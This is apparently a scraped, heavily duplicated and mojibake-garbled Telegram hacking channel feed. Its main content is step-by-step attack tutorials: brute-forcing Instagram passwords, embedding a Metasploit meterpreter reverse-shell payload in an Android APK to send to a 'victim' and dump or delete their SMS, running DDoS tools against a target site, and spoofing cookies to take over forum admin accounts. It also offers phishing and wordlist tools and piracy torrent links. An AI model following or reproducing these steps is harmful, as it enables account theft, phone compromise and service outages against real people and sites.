β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Sniffer may cause harm:
1) The sniffer can capture passwords
2) It can capture private or confidential information
3) It can be used to compromise the security of network neighbors, or to obtain higher-level access rights.
> In fact, If you have an unauthorized sniffer on the network, you think your system has been exposed to others. (You can try the sniffing function of Skyline 2)
4) Generally, we only sniff the first 200 to 300 bytes of each message. The username and password are included in this part, which is the real part we care about. Workers can also sniff all the packets on a given interface. If there is enough space for storage and enough for processing, they will find other very interesting things...
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Sniffer may cause harm:
1) The sniffer can capture passwords
2) It can capture private or confidential information
3) It can be used to compromise the security of network neighbors, or to obtain higher-level access rights.
> In fact, If you have an unauthorized sniffer on the network, you think your system has been exposed to others. (You can try the sniffing function of Skyline 2)
4) Generally, we only sniff the first 200 to 300 bytes of each message. The username and password are included in this part, which is the real part we care about. Workers can also sniff all the packets on a given interface. If there is enough space for storage and enough for processing, they will find other very interesting things...
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
Shellphish_Simple_Phishing_Toolkit_Phishing_Page_Creator_.pdf
1 MB
someone ask about phishing facebook via termux no root #requested
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦HACK INSTAGRAM WITH LINUX OS :
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) git clone https://github.com/Ethical-H4CK3R/Instagram.git
2) chmod -R 755 Instagram && cd Instagram
3) python instagram.py
4)get any wordlist example :
> > https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm
> http://www.insidepro.team/
> https://wiki.skullsecurity.org/Passwords
> https://github.com/danielmiessler/SecLists/tree/master/Passwords
> https://github.com/berzerk0/Probable-Wordlists
> https://github.com/topics/password-cracking
(up to 12 Gb wordlists)
5) install Tor with: sudo apt-get install tor
6) python instagram.py Username wordlist.txt
E N J O Y β€οΈππ»
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦HACK INSTAGRAM WITH LINUX OS :
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) git clone https://github.com/Ethical-H4CK3R/Instagram.git
2) chmod -R 755 Instagram && cd Instagram
3) python instagram.py
4)get any wordlist example :
> > https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm
> http://www.insidepro.team/
> https://wiki.skullsecurity.org/Passwords
> https://github.com/danielmiessler/SecLists/tree/master/Passwords
> https://github.com/berzerk0/Probable-Wordlists
> https://github.com/topics/password-cracking
(up to 12 Gb wordlists)
5) install Tor with: sudo apt-get install tor
6) python instagram.py Username wordlist.txt
E N J O Y β€οΈππ»
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - Bitwise-01/Instagram-: Bruteforce attack for Instagram.
Bruteforce attack for Instagram. . Contribute to Bitwise-01/Instagram- development by creating an account on GitHub.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦HACK WHATSAPP VIA LINUX-PARROT/KALI/UBUNTU :
A ) Install requirements :
1) apt-get install lib32stdc++6 lib32ncurses5 lib32z1
2) git clone https://github.com/SkullTech/apk-payload-injector
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
3) choose the APK PAYLOAD - recommended any cleaner apk
4) make sure to place both of the apk and the script you downloaded earlier in the same directory
5)type in terminal :
> ruby apk-embed-payload.rb cleanerapk.apk -p android/meterpreter/reverse_tcp LHOST=xxx.xxx.x.xxx LPORT=xxxx
6)now type :
> msfconsole
7) type in terminal :
> use multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST {local ip to listen on}
set LPORT {the port you set earlier}
exploit
8) now send the apk to the victim :))
9) after installing ββ->> use the command drop_sms
10) recommended :
root the phone and simply spoof the MAC adress using a terminal, download from playstore like termux
11) to delet the android sms db use this command :
> delete data/data/com.android.providers.telephony/databases/mmssms.db
E N J O Y β€οΈππ»
written by @medusaU
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦HACK WHATSAPP VIA LINUX-PARROT/KALI/UBUNTU :
A ) Install requirements :
1) apt-get install lib32stdc++6 lib32ncurses5 lib32z1
2) git clone https://github.com/SkullTech/apk-payload-injector
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
3) choose the APK PAYLOAD - recommended any cleaner apk
4) make sure to place both of the apk and the script you downloaded earlier in the same directory
5)type in terminal :
> ruby apk-embed-payload.rb cleanerapk.apk -p android/meterpreter/reverse_tcp LHOST=xxx.xxx.x.xxx LPORT=xxxx
6)now type :
> msfconsole
7) type in terminal :
> use multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST {local ip to listen on}
set LPORT {the port you set earlier}
exploit
8) now send the apk to the victim :))
9) after installing ββ->> use the command drop_sms
10) recommended :
root the phone and simply spoof the MAC adress using a terminal, download from playstore like termux
11) to delet the android sms db use this command :
> delete data/data/com.android.providers.telephony/databases/mmssms.db
E N J O Y β€οΈππ»
written by @medusaU
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - skulltech/apk-payload-injector: POC for injecting Metasploit payloads on arbitrary APKs
POC for injecting Metasploit payloads on arbitrary APKs - skulltech/apk-payload-injector
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦TOP TWITTER HACKING 2020 :
windows-linux
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) sudo apt install python-pip python-dev build-essential python2.7-dev python-pyexiv2 python-openssl
2) sudo pip install --upgrade pip
3) sudo pip install --upgrade virtualenv
4) sudo pip install --upgrade tweepy
5) sudo pip install --upgrade pillow
6) sudo pip install --upgrade exifread
7) sudo pip install --upgrade jinja2
8) sudo pip install --upgrade oauth2
9)download or clone https://github.com/vaguileradiaz/tinfoleak
10) Edit "tinfoleak.conf"
11) Use your favorite editor ;-)
12) Give value to these variables:
CONSUMER_KEY
CONSUMER_SECRET
ACCESS_TOKEN
ACCESS_TOKEN_SECRET
13) How to obtain these values:
https://developer.twitter.com/en/docs/basics/authentication/guides/access-tokens
Save "tinfoleak.conf"
Execute "tinfoleak.py"
E N J O Y β€οΈππ»
U S E F O R L E A R N
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦TOP TWITTER HACKING 2020 :
windows-linux
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) sudo apt install python-pip python-dev build-essential python2.7-dev python-pyexiv2 python-openssl
2) sudo pip install --upgrade pip
3) sudo pip install --upgrade virtualenv
4) sudo pip install --upgrade tweepy
5) sudo pip install --upgrade pillow
6) sudo pip install --upgrade exifread
7) sudo pip install --upgrade jinja2
8) sudo pip install --upgrade oauth2
9)download or clone https://github.com/vaguileradiaz/tinfoleak
10) Edit "tinfoleak.conf"
11) Use your favorite editor ;-)
12) Give value to these variables:
CONSUMER_KEY
CONSUMER_SECRET
ACCESS_TOKEN
ACCESS_TOKEN_SECRET
13) How to obtain these values:
https://developer.twitter.com/en/docs/basics/authentication/guides/access-tokens
Save "tinfoleak.conf"
Execute "tinfoleak.py"
E N J O Y β€οΈππ»
U S E F O R L E A R N
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - vaguileradiaz/tinfoleak: The most complete open-source tool for Twitter intelligence analysis
The most complete open-source tool for Twitter intelligence analysis - vaguileradiaz/tinfoleak
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦HTTP-FLOOD TOPIC (TERMUX/LINUX)
Wreckuests is a script, which allows you to run DDoS attacks with HTTP-flood(GET/POST). It's written in pure Python and uses proxy-servers as "bots". OF COURSE, this script is not universal and you can't just drop Pentagon/NSA/whatever website with just a single mouse click. Each attack is unique, and for each website you'd need to search for vulnerabilities and exult them.
F E T U R E S :
-Cache bypass with URL parameters randomization
-CloudFlare detection and notification of
-Automatic gzip/deflate toggling
-HTTP Authentication bypass
-UserAgent substitution
-Referers randomizer
-HTTP proxy support
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) https://github.com/JamesJGoodwin/wreckuests.GIT
2) chmod +x install.sh
3) ./install.sh
REQUIRE ROOT FOR TERMUX USERS
4) python3 wreckuests.py -v <target url> -a <login:pass> -t <timeout>
E N J O Y β€οΈππ»
U S E F O R L E A R N
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦HTTP-FLOOD TOPIC (TERMUX/LINUX)
Wreckuests is a script, which allows you to run DDoS attacks with HTTP-flood(GET/POST). It's written in pure Python and uses proxy-servers as "bots". OF COURSE, this script is not universal and you can't just drop Pentagon/NSA/whatever website with just a single mouse click. Each attack is unique, and for each website you'd need to search for vulnerabilities and exult them.
F E T U R E S :
-Cache bypass with URL parameters randomization
-CloudFlare detection and notification of
-Automatic gzip/deflate toggling
-HTTP Authentication bypass
-UserAgent substitution
-Referers randomizer
-HTTP proxy support
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) https://github.com/JamesJGoodwin/wreckuests.GIT
2) chmod +x install.sh
3) ./install.sh
REQUIRE ROOT FOR TERMUX USERS
4) python3 wreckuests.py -v <target url> -a <login:pass> -t <timeout>
E N J O Y β€οΈππ»
U S E F O R L E A R N
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦updated 2020 node.js module for getting and setting HTTP(S) cookies
> Cookies can be signed to prevent tampering, using Keygrip. It can be used with the built-in node.js HTTP library, or as Connect/Express middleware.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) open open any debian base terminal and type
> npm install
2) $ npm install cookies
3) express.createServer( Cookies.express( keys ) )
>This adds cookie support as a Connect middleware layer for use in Express apps, allowing inbound cookies to be read using req.cookies.get and outbound cookies to be set using res.cookies.set.
4) full usage on: https://github.com/pillarjs/cookies
π¦ F E A T U R E S :
1) Lazy: Since cookie verification against multiple keys could be expensive, cookies are only verified lazily when accessed, not eagerly on each request.
2) Secure: All cookies are httponly by default, and cookies sent over SSL are secure by default. An error will be thrown if you try to send secure cookies over an insecure socket.
3) Unobtrusive: Signed cookies are stored the same way as unsigned cookies, instead of in an obfuscated signing format. An additional signature cookie is stored for each signed cookie, using a standard naming convention (cookie-name.sig). This allows other libraries to access the original cookies without having to know the signing mechanism.
4) Agnostic: This library is optimized for use with Keygrip, but does not require it; you can implement your own signing scheme instead if you like and use this library only to read/write cookies. Factoring the signing into a separate library encourages code reuse and allows you to use the same signing library for other areas where signing is needed, such as in URLs.
E N J O Y β€οΈππ»
U S E F O R L E A R N
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦updated 2020 node.js module for getting and setting HTTP(S) cookies
> Cookies can be signed to prevent tampering, using Keygrip. It can be used with the built-in node.js HTTP library, or as Connect/Express middleware.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) open open any debian base terminal and type
> npm install
2) $ npm install cookies
3) express.createServer( Cookies.express( keys ) )
>This adds cookie support as a Connect middleware layer for use in Express apps, allowing inbound cookies to be read using req.cookies.get and outbound cookies to be set using res.cookies.set.
4) full usage on: https://github.com/pillarjs/cookies
π¦ F E A T U R E S :
1) Lazy: Since cookie verification against multiple keys could be expensive, cookies are only verified lazily when accessed, not eagerly on each request.
2) Secure: All cookies are httponly by default, and cookies sent over SSL are secure by default. An error will be thrown if you try to send secure cookies over an insecure socket.
3) Unobtrusive: Signed cookies are stored the same way as unsigned cookies, instead of in an obfuscated signing format. An additional signature cookie is stored for each signed cookie, using a standard naming convention (cookie-name.sig). This allows other libraries to access the original cookies without having to know the signing mechanism.
4) Agnostic: This library is optimized for use with Keygrip, but does not require it; you can implement your own signing scheme instead if you like and use this library only to read/write cookies. Factoring the signing into a separate library encourages code reuse and allows you to use the same signing library for other areas where signing is needed, such as in URLs.
E N J O Y β€οΈππ»
U S E F O R L E A R N
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - pillarjs/cookies: Signed and unsigned cookies based on Keygrip
Signed and unsigned cookies based on Keygrip. Contribute to pillarjs/cookies development by creating an account on GitHub.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Qualcomm confirms that Snapdragon DSP flaws can expose 40% of smartphones to hackers :
#news
>Qualcomm has confirmed that it has found a huge flaw in their smartphone chipset, leaving the phone completely exposed to hackers. The vulnerability was discovered by Check Point security company. A large number of flaws in the Snapdragon DSP in Android phones can allow hackers to steal data, install hidden spyware that is difficult to find, and even completely damage the phone and make it unusable.
> Check Point publicly disclosed this flaw on Pwn2Own, revealing that the security setting of the DSP in the built-in Qualcomm Snapdragon processor phone was easily bypassed, and 400 exploitable flaws were found in the code.
> For security reasons, cDSP is authorized to OEM manufacturers and limited third-party software vendors for programming. The code running on the DSP is signed by Qualcomm. The security agency successfully demonstrated how Android applications can bypass Qualcommβs signature and execute privileged code on the DSP, and what further security issues this will cause.. (check picture here after this telegram post)
> Hexagon SDK is the official way to prepare DSP-related code for manufacturers. Its SDK has serious bugs, which leads to hundreds of hidden vulnerabilities in Qualcomm's own and manufacturer codes. In fact, almost all DSP executable libraries embedded in Qualcomm-based smart phones will be attacked due to problems with the Hexagon SDK, and the resulting and exposed security vulnerabilities can be exploited by hackers.
#news
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Qualcomm confirms that Snapdragon DSP flaws can expose 40% of smartphones to hackers :
#news
>Qualcomm has confirmed that it has found a huge flaw in their smartphone chipset, leaving the phone completely exposed to hackers. The vulnerability was discovered by Check Point security company. A large number of flaws in the Snapdragon DSP in Android phones can allow hackers to steal data, install hidden spyware that is difficult to find, and even completely damage the phone and make it unusable.
> Check Point publicly disclosed this flaw on Pwn2Own, revealing that the security setting of the DSP in the built-in Qualcomm Snapdragon processor phone was easily bypassed, and 400 exploitable flaws were found in the code.
> For security reasons, cDSP is authorized to OEM manufacturers and limited third-party software vendors for programming. The code running on the DSP is signed by Qualcomm. The security agency successfully demonstrated how Android applications can bypass Qualcommβs signature and execute privileged code on the DSP, and what further security issues this will cause.. (check picture here after this telegram post)
> Hexagon SDK is the official way to prepare DSP-related code for manufacturers. Its SDK has serious bugs, which leads to hundreds of hidden vulnerabilities in Qualcomm's own and manufacturer codes. In fact, almost all DSP executable libraries embedded in Qualcomm-based smart phones will be attacked due to problems with the Hexagon SDK, and the resulting and exposed security vulnerabilities can be exploited by hackers.
#news
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦FASTEST DDOS FOR TERMUX -2020
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) Open Terminal in Kali Linux or Termux in Android
2) mkdir ddos
3) cd ddos
4) pkg install python2
5) pkg install git
6) git clone https://github.com/jseidl/GoldenEye.git
7) cd GoldenEye/
8) ./goldeneye.py victim-website.com
9) python2 ./goldeneye.py victim-website.com
10) Add values for workers (-w), sockets (-s) and method (-m)
./goldeneye.py victim-website.com -w 100 -s 70 -m post
USE FOR LEARN
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦FASTEST DDOS FOR TERMUX -2020
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) Open Terminal in Kali Linux or Termux in Android
2) mkdir ddos
3) cd ddos
4) pkg install python2
5) pkg install git
6) git clone https://github.com/jseidl/GoldenEye.git
7) cd GoldenEye/
8) ./goldeneye.py victim-website.com
9) python2 ./goldeneye.py victim-website.com
10) Add values for workers (-w), sockets (-s) and method (-m)
./goldeneye.py victim-website.com -w 100 -s 70 -m post
USE FOR LEARN
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - jseidl/GoldenEye: GoldenEye Layer 7 (KeepAlive+NoCache) DoS Test Tool
GoldenEye Layer 7 (KeepAlive+NoCache) DoS Test Tool - jseidl/GoldenEye
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦What is Sniffing & how many categories :
> Sniffing sniffer cares about can be divided into the following categories:
1) Password
I think this is the reason for most illegal use of sniffer, sniffer can record the userid and passwd transmitted in plain text. Even if you use encryption during network transmission Data, like the data recorded by sniffer, may make the intruder try to figure out your algorithm while eating skewers at home.
2) Financial account
Many users are at ease using their credit card or cash account on the Internet, but sniffers can easily intercept the user name, password, credit card number, expiration date, account number, and pin sent online.
3) Peeping confidential or sensitive information and data
through interception Data packets, intruders can easily record the transfer of sensitive information between others, or simply intercept the entire email conversation process.
4) Spy on low-level protocol information.
This is a terrible thing, I think, by recording the underlying information protocol, such as recording the network interface address between two hosts, the remote network interface ip address, ip routing information, and the byte order number of the tcp connection.
5) This information will post a great harm to network security after being mastered by illegal intruders. Usually someone uses sniffers to collect this information for only one reason: he is conducting a fraud, (usually ip address fraud requires you to accurately insert the tcp connection Byte order number, which will be pointed out in a later article) If someone is very concerned about this issue, then the sniffer is just a prelude to him, and the problem will be much bigger in the future. (For advanced hackers, I think this is the only reason to use sniffer attacks)
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦What is Sniffing & how many categories :
> Sniffing sniffer cares about can be divided into the following categories:
1) Password
I think this is the reason for most illegal use of sniffer, sniffer can record the userid and passwd transmitted in plain text. Even if you use encryption during network transmission Data, like the data recorded by sniffer, may make the intruder try to figure out your algorithm while eating skewers at home.
2) Financial account
Many users are at ease using their credit card or cash account on the Internet, but sniffers can easily intercept the user name, password, credit card number, expiration date, account number, and pin sent online.
3) Peeping confidential or sensitive information and data
through interception Data packets, intruders can easily record the transfer of sensitive information between others, or simply intercept the entire email conversation process.
4) Spy on low-level protocol information.
This is a terrible thing, I think, by recording the underlying information protocol, such as recording the network interface address between two hosts, the remote network interface ip address, ip routing information, and the byte order number of the tcp connection.
5) This information will post a great harm to network security after being mastered by illegal intruders. Usually someone uses sniffers to collect this information for only one reason: he is conducting a fraud, (usually ip address fraud requires you to accurately insert the tcp connection Byte order number, which will be pointed out in a later article) If someone is very concerned about this issue, then the sniffer is just a prelude to him, and the problem will be much bigger in the future. (For advanced hackers, I think this is the only reason to use sniffer attacks)
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Crack mysql root password :
Windows:
1) Log in to the system with the system administrator.
2) Stop the MySQL service.
3) Enter the command window, and then enter the MySQL installation directory, for example, my installation directory is c:\mysql, enter C:\mysql\bin
4) Skip the permission check to start MySQL,
c:\mysql\bin>mysqld-nt --skip-grant-tables
5) Reopen a window, enter the c:\mysql\bin directory, and set the new root password
7) Stop MySQL Server and start Mysql in normal mode
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Crack mysql root password :
Windows:
1) Log in to the system with the system administrator.
2) Stop the MySQL service.
3) Enter the command window, and then enter the MySQL installation directory, for example, my installation directory is c:\mysql, enter C:\mysql\bin
4) Skip the permission check to start MySQL,
c:\mysql\bin>mysqld-nt --skip-grant-tables
5) Reopen a window, enter the c:\mysql\bin directory, and set the new root password
c:\mysql\bin>mysqladmin -u root flush-privileges password "newpassword"6) replace newpassword with the root password you want to use. The second command will prompt you to enter the new password. Repeat the password entered in the first command.
>c:\mysql \bin>mysqladmin -u root -p shutdown
7) Stop MySQL Server and start Mysql in normal mode
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Hack email accounts or passwords using session cookie :
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
A) UNDERSTANDING :
1) Cookies spoofing is to obtain the corresponding user permission to log in by modifying the content of Cookies in a system that only authenticates users with Cookies.
π¦ So what are Cookies?
<> Let me give you a professional explanation. Cookies is a text file stored in the browser directory, which records the information about your visit to a specific site, and can only be read back by the site that created the Cookie. It consists of 255 characters and only occupies 4KB of hard disk space. When the user is browsing a certain site, it is stored in the random access memory RAM of the user machine, and after exiting the browser, it is stored in the user's hard disk. Most of the information stored in Cookies is common
Second, principle analysis
B ) A T T A C K :
Let's first take a look at how 6kbbs is done. In login.asp we find 113-124 lines, look here : ))
if login=false then tl=" login failed" mes=mes&"
Β·Return to fill in "else Response.Cookies(prefix)("lgname")
=lgname session(prefix"lgname")=
lgname Response.Cookies(prefix)("lgpwd")=
lgpwd Response.Cookies(prefix)("lgtype")=
lgtype Response.Cookies(prefix)("lgcook")=
cook if cook>0 then Response.Cookies(prefix).Expires=
date+cook end if
3) Let me change the meaning of this passage. If you fail to log in, it will show you login failed and lead you back to the previous page, otherwise it will be written into Cookies for you. If your Cookies have it, then yours The expiration time is the expiration time of your cookies-that is, the time you save the cookies.
4) now I take 6kbbs as an example, and assume that you have already obtained the website database or the administrator's MD5 encrypted password. How to get it, go to the search engine to search for the keyword "powered by 6kbbs", and then you will see a lot of 6kbbs websites.
5) Open IECookiesView, this software is used to view and modify the cookies of this machine, which is very convenient for our cookies to deceive and invade.
N O T E S :
<> The deception of this undercode tutorial can only get the front-end administrator authority, the back-end needs to enter a password, and it is Session authentication, not Cookies, so we can't deceive.
<> Cookies spoofing exists in a large number of current programs that do not do Session verification. So, if you get the database or administrator encryption password, you might as well try Cookies spoofing, it will have unexpected effects.
E N J O Y β€οΈππ»
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Hack email accounts or passwords using session cookie :
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
A) UNDERSTANDING :
1) Cookies spoofing is to obtain the corresponding user permission to log in by modifying the content of Cookies in a system that only authenticates users with Cookies.
π¦ So what are Cookies?
<> Let me give you a professional explanation. Cookies is a text file stored in the browser directory, which records the information about your visit to a specific site, and can only be read back by the site that created the Cookie. It consists of 255 characters and only occupies 4KB of hard disk space. When the user is browsing a certain site, it is stored in the random access memory RAM of the user machine, and after exiting the browser, it is stored in the user's hard disk. Most of the information stored in Cookies is common
Second, principle analysis
B ) A T T A C K :
Let's first take a look at how 6kbbs is done. In login.asp we find 113-124 lines, look here : ))
if login=false then tl=" login failed" mes=mes&"
Β·Return to fill in "else Response.Cookies(prefix)("lgname")
=lgname session(prefix"lgname")=
lgname Response.Cookies(prefix)("lgpwd")=
lgpwd Response.Cookies(prefix)("lgtype")=
lgtype Response.Cookies(prefix)("lgcook")=
cook if cook>0 then Response.Cookies(prefix).Expires=
date+cook end if
3) Let me change the meaning of this passage. If you fail to log in, it will show you login failed and lead you back to the previous page, otherwise it will be written into Cookies for you. If your Cookies have it, then yours The expiration time is the expiration time of your cookies-that is, the time you save the cookies.
4) now I take 6kbbs as an example, and assume that you have already obtained the website database or the administrator's MD5 encrypted password. How to get it, go to the search engine to search for the keyword "powered by 6kbbs", and then you will see a lot of 6kbbs websites.
5) Open IECookiesView, this software is used to view and modify the cookies of this machine, which is very convenient for our cookies to deceive and invade.
N O T E S :
<> The deception of this undercode tutorial can only get the front-end administrator authority, the back-end needs to enter a password, and it is Session authentication, not Cookies, so we can't deceive.
<> Cookies spoofing exists in a large number of current programs that do not do Session verification. So, if you get the database or administrator encryption password, you might as well try Cookies spoofing, it will have unexpected effects.
E N J O Y β€οΈππ»
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦2020 apps FOR SHOWING WIFI SAVED PASSWORD :
Download it from https://play.google.com/store/apps/details?id=com.doionline.wifipasswordrecovery&hl=en_US
Download it from https://wifi-password-root.en.uptodown.com/android
Download it from https://play.google.com/store/apps/details?id=com.sbacham.srinu.showwifipassword2017&hl=en_US
Download it from https://play.google.com/store/apps/details?id=com.matic.showwifipassword&hl=en
π¦for windows :
https://wifi-password-revealer.en.uptodown.com/windows
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦2020 apps FOR SHOWING WIFI SAVED PASSWORD :
Download it from https://play.google.com/store/apps/details?id=com.doionline.wifipasswordrecovery&hl=en_US
Download it from https://wifi-password-root.en.uptodown.com/android
Download it from https://play.google.com/store/apps/details?id=com.sbacham.srinu.showwifipassword2017&hl=en_US
Download it from https://play.google.com/store/apps/details?id=com.matic.showwifipassword&hl=en
π¦for windows :
https://wifi-password-revealer.en.uptodown.com/windows
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦BEST TORRENT SITES FOR MOVIES :
> https://thepiratebay10.org
> https://rarbg.to/index70.php
> https://1337x.to/
> https://torrentz2.eu/ (sometimes down)
> http://www.yts.am/
> https://eztv.io/
> https://zooqle.com/
> https://zooqle.com/
> https://torrentdownloads.mrunblock.xyz/
> https://www.limetorrents.info/
N O T E :
you can.t download without any torrent client app ;)
E N J O Y β€οΈππ»
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦BEST TORRENT SITES FOR MOVIES :
> https://thepiratebay10.org
> https://rarbg.to/index70.php
> https://1337x.to/
> https://torrentz2.eu/ (sometimes down)
> http://www.yts.am/
> https://eztv.io/
> https://zooqle.com/
> https://zooqle.com/
> https://torrentdownloads.mrunblock.xyz/
> https://www.limetorrents.info/
N O T E :
you can.t download without any torrent client app ;)
E N J O Y β€οΈππ»
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
thepiratebay10.xyz
Download music, movies, games, software! The Pirate Bay - The galaxy's most resilient BitTorrent site
Download music, movies, games, software and much more. The Pirate Bay is the galaxy's most resilient BitTorrent site.
The Growth Hackersβ Guide to Google Dorks.pdf
16.1 KB
The Growth Hackersβ Guide to Google Dorks
π¦A powerful and useful hacker dictionary builder for a brute-force attack
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) git clone --depth=1 --branch=master https://www.github.com/landgrey/
pydictor.git
2) cd pydictor/
3) chmod +x pydictor.py
4) python pydictor.py
5) choose options as shown in picture :)
β β β Uππ»βΊπ«Δπ¬πβ β β β
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) git clone --depth=1 --branch=master https://www.github.com/landgrey/
pydictor.git
2) cd pydictor/
3) chmod +x pydictor.py
4) python pydictor.py
5) choose options as shown in picture :)
β β β Uππ»βΊπ«Δπ¬πβ β β β
#News
Threat Post reported that: Chromium kernel-based browsers have been exposed to a content security policy (CSP) vulnerability that can be bypassed, leaving billions of users vulnerable to attackers to steal data and execute malicious code. PerimeterX network security researcher Gal Weizman pointed out that the vulnerability (CVE-2020-6519) can be found in Chrome browsers for Windows, Mac and Android, as well as Opera and Edge.
>It is reported that as a Web standard, the Content Security Policy (CSP) is designed to prevent certain types of attacks, such as cross-site scripting (XSS) and data-injection.
CSP allows web administrators to specify the effective source range of scripts executable by browsers, so that browsers compatible with the standard only execute script loading operations from trusted sources.
β β β Uππ»βΊπ«Δπ¬πβ β β β
Threat Post reported that: Chromium kernel-based browsers have been exposed to a content security policy (CSP) vulnerability that can be bypassed, leaving billions of users vulnerable to attackers to steal data and execute malicious code. PerimeterX network security researcher Gal Weizman pointed out that the vulnerability (CVE-2020-6519) can be found in Chrome browsers for Windows, Mac and Android, as well as Opera and Edge.
>It is reported that as a Web standard, the Content Security Policy (CSP) is designed to prevent certain types of attacks, such as cross-site scripting (XSS) and data-injection.
CSP allows web administrators to specify the effective source range of scripts executable by browsers, so that browsers compatible with the standard only execute script loading operations from trusted sources.
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦With Django Hijack, admins can log in and work on behalf of other users without having to know their credentials
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) Get the latest stable release from PyPi:
pip install django-hijack
2) In your settings.py, add hijack and the dependency compat to your installed apps:
INSTALLEDAPPS = (
...,
'hijack',
'compat',
)
3) Finally, add the Django Hijack URLs to urls.py:
urlpatterns = [
...
url(r'^hijack/', include('hijack.urls', namespace='hijack')),
]
4) After installing
Setting up redirections
> You should specify a HIJACKLOGINREDIRECTURL and a HIJACKLOGOUTREDIRECTURL. This is where admins are redirected to after hijacking or releasing a user. Both settings default to LOGINREDIRECTURL.
# settings.py
HIJACKLOGINREDIRECTURL = '/profile/' # Where admins are redirected to after hijacking a user
HIJACKLOGOUTREDIRECTURL = '/admin/auth/user/' # Where admins are redirected to after releasing a user
5) Setting up the notification bar
We strongly recommend displaying a notification bar to everyone who is hijacking another user. This reduces the risk of an admin hijacking someone inadvertently or forgetting to release the user afterwards.
6) To set up the notification bar, add the following lines to your base.html or to another template in which you want the notification bar to be displayed.
<!-- At the top -->
{% load staticfiles %}
{% load hijacktags %}
...
<!-- In the head -->
<link rel="stylesheet" type="text/css" href="{% static 'hijack/hijack-styles.css' %}" />
...
<!-- Directly after <body> -->
{% hijacknotification %}
...
7) If your project uses Bootstrap you may want to set HIJACKUSEBOOTSTRAP = True in your project settings. Django Hijack will display a Bootstrap notification bar that does not overlap with the default navbar.
8) Generic template filter
We also provide a generic template filter to check if you are currently hijacking a user. This is useful for displaying/hiding elements besides the notification bar.
{% load hijacktags %}
{% if request|ishijacked %}
...
{% endif %}
9) The following URLs are available by default:
/hijack/<user id>
/hijack/username/<username>
/hijack/email/<user email>
10) If the hijacking is successful, the user is redirected to the HIJACKLOGINREDIRECTURL, and the yellow notification bar is displayed at the top of the landing page.
Here is a reference implementation of a button that allows a superuser to hijack the user referenced by the context variable user:
E N J O Y β€οΈππ»
U S E F O R L E A R N
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦With Django Hijack, admins can log in and work on behalf of other users without having to know their credentials
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) Get the latest stable release from PyPi:
pip install django-hijack
